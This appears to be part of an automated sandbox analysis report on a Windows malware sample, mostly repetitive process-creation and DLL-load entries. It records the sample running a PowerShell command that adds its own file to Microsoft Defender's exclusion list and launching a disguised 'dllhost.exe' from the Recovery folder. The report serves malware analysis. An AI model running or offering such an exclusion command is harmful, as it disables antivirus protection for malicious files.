                          Source: C:\Users\user\Desktop\UuIspZT5b6.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\UuIspZT5b6.exe'Jump to behavior
                          Source: C:\Users\user\Desktop\UuIspZT5b6.exeProcess created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /C "C:\Users\user\AppData\Local\Temp\fCpmFQ1klK.bat" Jump to behavior
                          Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RES4F01.tmp" "c:\Windows\System32\CSC2F4CE5DB480645CC91828FC1D1E7D450.TMP"Jump to behavior
                          Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\chcp.com chcp 65001
                          Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\w32tm.exe w32tm /stripchart /computer:localhost /period:5 /dataonly /samples:2
                          Source: C:\Windows\System32\cmd.exeProcess created: C:\Recovery\dllhost.exe "C:\Recovery\dllhost.exe"
                          Source: C:\Users\user\Desktop\UuIspZT5b6.exeSection loaded: mscoree.dllJump to behavior
                          Source: C:\Users\user\Desktop\UuIspZT5b6.exeSection loaded: apphelp.dllJump to behavior
                          Source: C:\Users\user\Desktop\UuIspZT5b6.exeSection loaded: kernel.appcore.dllJump to behavior
                          Source: C:\Users\user\Desktop\UuIspZT5b6.exeSection loaded: version.dllJump to behavior
                          Source: C:\Users\user\Desktop\UuIspZT5b6.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                          Source: C:\Users\user\Desktop\UuIspZT5b6.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                          Source: C:\Users\user\Desktop\UuIspZT5b6.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                          Source: C:\Users\user\Desktop\UuIspZT5b6.exeSection loaded: uxtheme.dllJump to behavior
                          Source: C:\Users\user\Desktop\UuIspZT5b6.exeSection loaded: windows.storage.dllJump to behavior
                          Source: C:\Users\user\Desktop\UuIspZT5b6.exeSection loaded: wldp.dllJump to behavior
                          Source: C:\Users\user\Desktop\UuIspZT5b6.exeSection loaded: profapi.dllJump to behavior
                          Source: C:\Users\user\Desktop\UuIspZT5b6.exeSection loaded: cryptsp.dllJump to behavior
                          Source: C:\Users\user\Desktop\UuIspZT5b6.exeSection loaded: rsaenh.dllJump to behavior
                          Source: C:\Users\user\Desktop\UuIspZT5b6.exeSection loaded: cryptbase.dllJump to behavior
                          Source: C:\Users\user\Desktop\UuIspZT5b6.exeSection loaded: sspicli.dllJump to behavior
                          Source: C:\Users\user\Desktop\UuIspZT5b6.exeSection loaded: ktmw32.dllJump to behavior
                          Source: C:\Users\user\Desktop\UuIspZT5b6.exeSection loaded: ntmarta.dllJump to behavior
                          Source: C:\Users\user\Desktop\UuIspZT5b6.exeSection loaded: wbemcomn.dllJump to behavior
                          Source: C:\Users\user\Desktop\UuIspZT5b6.exeSection loaded: amsi.dllJump to behavior
                          Source: C:\Users\user\Desktop\UuIspZT5b6.exeSection loaded: userenv.dllJump to behavior
                          Source: C:\Users\user\Desktop\UuIspZT5b6.exeSection loaded: propsys.dllJump to behavior
                          Source: C:\Users\user\Desktop\UuIspZT5b6.exeSection loaded: dlnashext.dllJump to behavior
                          Source: C:\Users\user\Desktop\UuIspZT5b6.exeSection loaded: wpdshext.dllJump to behavior
                          Source: C:\Users\user\Desktop\UuIspZT5b6.exeSection loaded: edputil.dllJump to behavior
                          Source: C:\Users\user\Desktop\UuIspZT5b6.exeSection loaded: urlmon.dllJump to behavior
                          Source: C:\Users\user\Desktop\UuIspZT5b6.exeSection loaded: iertutil.dllJump to behavior
                          Source: C:\Users\user\Desktop\UuIspZT5b6.exeSection loaded: srvcli.dllJump to behavior
                          Source: C:\Users\user\Desktop\UuIspZT5b6.exeSection loaded: netutils.dllJump to behavior
                          Source: C:\Users\user\Desktop\UuIspZT5b6.exeSection loaded: windows.staterepositoryps.dllJump to behavior
                          Source: C:\Users\user\Desktop\UuIspZT5b6.exeSection loaded: wintypes.dllJump to behavior
                          Source: C:\Users\user\Desktop\UuIspZT5b6.exeSection loaded: appresolver.dllJump to behavior
                          Source: C:\Users\user\Desktop\UuIspZT5b6.exeSection loaded: bcp47langs.dllJump to behavior
                          Source: C:\Users\user\Desktop\UuIspZT5b6.exeSection loaded: slc.dllJump to behavior
                          Source: C:\Users\user\Desktop\UuIspZT5b6.exeSection loaded: sppc.dllJump to behavior
                          Source: C:\Users\user\Desktop\UuIspZT5b6.exeSection loaded: onecorecommonproxystub.dllJump to behavior
                          Source: C:\Users\user\Desktop\UuIspZT5b6.exeSection loaded: onecoreuapcommonproxystub.dllJump to behavior
                          Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                          Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                          Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeSection loaded: version.dllJump to behavior
                          Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeSection loaded: kernel.appcore.dllJump to behavior
                          Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeSection loaded: mscoree.dllJump to behavior
                          Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeSection loaded: cryptsp.dllJump to behavior
                          Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeSection loaded: rsaenh.dllJump to behavior
                          Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeSection loaded: cryptbase.dllJump to behavior
                          Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                          Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                          Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exeSection loaded: cryptsp.dllJump to behavior
                          Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exeSection loaded: rsaenh.dllJump to behavior
                          Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exeSection loaded: cryptbase.dllJump to behavior
                          Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exeSection loaded: kernel.appcore.dllJump to behavior
                          Source: C:\Recovery\dllhost.exeSection loaded: mscoree.dllJump to behavior
                          Source: C:\Recovery\dllhost.exeSection loaded: apphelp.dllJump to behavior
                          Source: C:\Recovery\dllhost.exeSection loaded: kernel.appcore.dllJump to behavior
                          Source: C:\Recovery\dllhost.exeSection loaded: version.dllJump to behavior
                          Source: C:\Recovery\dllhost.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                          Source: C:\Recovery\dllhost.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                          Source: C:\Recovery\dllhost.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                          Source: C:\Recovery\dllhost.exeSection loaded: uxtheme.dllJump to behavior
                          Source: C:\Recovery\dllhost.exeSection loaded: windows.storage.dllJump to behavior
                          Source: C:\Recovery\dllhost.exeSection loaded: wldp.dllJump to behavior
                          Source: C:\Recovery\dllhost.exeSection loaded: profapi.dllJump to behavior
                          Source: C:\Recovery\dllhost.exeSection loaded: cryptsp.dllJump to behavior
                          Source: C:\Recovery\dllhost.exeSection loaded: rsaenh.dllJump to behavior
                          Source: C:\Recovery\dllhost.exeSection loaded: cryptbase.dllJump to behavior
                          Source: C:\Recovery\dllhost.exeSection loaded: sspicli.dllJump to behavior
                          Source: C:\Recovery\dllhost.exeSection loaded: mscoree.dllJump to behavior
                          Source: C:\Recovery\dllhost.exeSection loaded: kernel.appcore.dllJump to behavior
                          Source: C:\Recovery\dllhost.exeSection loaded: version.dllJump to behavior
                          Source: C:\Recovery\dllhost.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                          Source: C:\Recovery\dllhost.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                          Source: C:\Recovery\dllhost.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                          Source: C:\Recovery\dllhost.exeSection loaded: uxtheme.dllJump to behavior
                          Source: C:\Recovery\dllhost.exeSection loaded: windows.storage.dllJump to behavior
                          Source: C:\Recovery\dllhost.exeSection loaded: wldp.dllJump to behavior
                          Source: C:\Recovery\dllhost.exeSection loaded: profapi.dllJump to behavior
                          Source: C:\Recovery\dllhost.exeSection loaded: cryptsp.dllJump to behavior
                          Source: C:\Recovery\dllhost.exeSection loaded: rsaenh.dllJump to behavior
                          Source: C:\Recovery\dllhost.exeSection loaded: cryptbase.dllJump to behavior
                          Source: C:\Recovery\dllhost.exeSection loaded: sspicli.dllJump to behavior
                          Source: C:\Windows\System32\schtasks.exeSection loaded: kernel.appcore.dllJump to behavior
                          Source: C:\Windows\System32\schtasks.exeSection loaded: taskschd.dllJump to behavior
                          Source: C:\Windows\System32\schtasks.exeSection loaded: sspicli.dllJump to behavior
                          Source: C:\Windows\System32\schtasks.exeSection loaded: xmllite.dllJump to behavior
                          Source: C:\Windows\System32\schtasks.exeSection loaded: kernel.appcore.dllJump to behavior
                          Source: C:\Windows\System32\schtasks.exeSection loaded: taskschd.dllJump to behavior
                          Source: C:\Windows\System32\schtasks.exeSection loaded: sspicli.dllJump to behavior
                          Source: C:\Windows\System32\schtasks.exeSection loaded: xmllite.dllJump to behavior
                          Source: C:\Windows\System32\schtasks.exeSection loaded: kernel.appcore.dllJump to behavior
                          Source: C:\Windows\System32\schtasks.exeSection loaded: taskschd.dllJump to behavior
                          Source: C:\Windows\System32\schtasks.exeSection loaded: sspicli.dllJump to behavior
                          Source: C:\Windows\System32\schtasks.exeSection loaded: xmllite.dllJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dllJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dllJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dllJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dllJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dllJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dllJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dllJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dllJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dllJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dllJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dllJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dllJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dllJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dllJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dllJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dllJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dllJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dllJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dllJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dllJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: urlmon.dllJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: iertutil.dllJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: srvcli.dllJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: netutils.dllJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: propsys.dllJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wininet.dllJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: microsoft.management.infrastructure.native.unmanaged.dllJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mi.dllJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: miutils.dllJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wmidcom.dllJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dpapi.dllJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wbemcomn.dllJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dllJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dllJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dllJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dllJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dllJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dllJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dllJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dllJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dllJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dllJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dllJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dllJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dllJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dllJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dllJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dllJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dllJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dllJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dllJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dllJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: urlmon.dllJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: iertutil.dllJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: srvcli.dllJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: netutils.dllJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: propsys.dllJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wininet.dllJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: microsoft.management.infrastructure.native.unmanaged.dllJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mi.dllJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: miutils.dllJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wmidcom.dllJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dpapi.dllJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wbemcomn.dllJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dll
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dll
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dll
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dll
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dll
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dll
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dll
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dll
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dll
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dll
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dll
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dll
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dll
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dll
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dll
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dll
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dll
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dll
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dll
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dll
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dll
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dll
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dll
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dll
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: urlmon.dll
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: iertutil.dll
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: srvcli.dll
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: netutils.dll
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: propsys.dll
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wininet.dll
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: microsoft.management.infrastructure.native.unmanaged.dll
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mi.dll
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: miutils.dll
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wmidcom.dll
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dpapi.dll
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wbemcomn.dll
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dll
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dll
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dll
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dll
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dll
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dll
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dll
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dll
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dll
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dll
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dll
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dll
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dll
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dll
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dll
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dll
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dll
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dll
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dll
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dll
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dll
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dll
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dll
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dll
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: urlmon.dll
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: iertutil.dll
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: srvcli.dll
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: netutils.dll
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: propsys.dll
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wininet.dll
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: microsoft.management.infrastructure.native.unmanaged.dll
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mi.dll
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: miutils.dll
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wmidcom.dll
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dpapi.dll
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wbemcomn.dll
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dll
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dll
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dll
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dll
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dll
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dll
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dll
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dll
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dll
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dll
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dll
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dll
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dll
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dll
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dll
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dll
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dll
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dll
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dll
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dll
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dll
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dll
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dll
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dll
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: urlmon.dll
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: iertutil.dll
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: srvcli.dll
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: netutils.dll
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: propsys.dll
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wininet.dll
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: microsoft.management.infrastructure.native.unmanaged.dll
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mi.dll
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: miutils.dll
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wmidcom.dll
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dpapi.dll
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wbemcomn.dll
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dll
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dll
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dll
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dll
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dll
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dll
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dll
